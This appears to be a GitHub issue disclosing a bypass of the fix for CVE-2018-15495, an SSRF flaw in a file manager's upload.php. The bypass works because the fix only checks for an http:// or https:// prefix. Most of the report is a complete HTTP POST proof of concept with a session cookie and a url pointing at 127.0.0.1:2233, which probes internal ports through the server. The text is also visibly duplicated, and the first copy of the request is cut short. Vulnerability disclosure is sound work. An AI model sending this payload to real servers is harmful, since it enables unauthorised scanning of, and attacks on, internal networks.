In upload.php we can download a pic in remote server. code in line 68~91。
Jul 27, 2018 commit a fix to limit url in order to prohibit ssrf vuln CVE-2018-15495
but the fix only check the parm url startwith http:// or https://
we still can use http protocol to Probe intranet and attack intarnet server。For Example:
`POST /filemanager/upload.php HTTP/1.1
Host: localhost
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9gov40jg57e4bo2olu5rqr8oc0; login=76a61a8504394f9c08ec4d7d747d3377
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
In upload.php we can download a pic in remote server. code in line 68~91。
Jul 27, 2018 commit a fix to limit url in order to prohibit ssrf vuln
CVE-2018-15495
but the fix only check the parm url startwith http:// or https://
we still can use http protocol to Probe intranet and attack intarnet server。For Example:
`POST /filemanager/upload.php HTTP/1.1
Host: localhost
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9gov40jg57e4bo2olu5rqr8oc0; login=76a61a8504394f9c08ec4d7d747d3377
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
fldr=test/&url=http://127.0.0.1:2233/aaaaaaa`
and when the port is open will response {"error":"Invalid URL"}
The text was updated successfully, but these errors were encountered: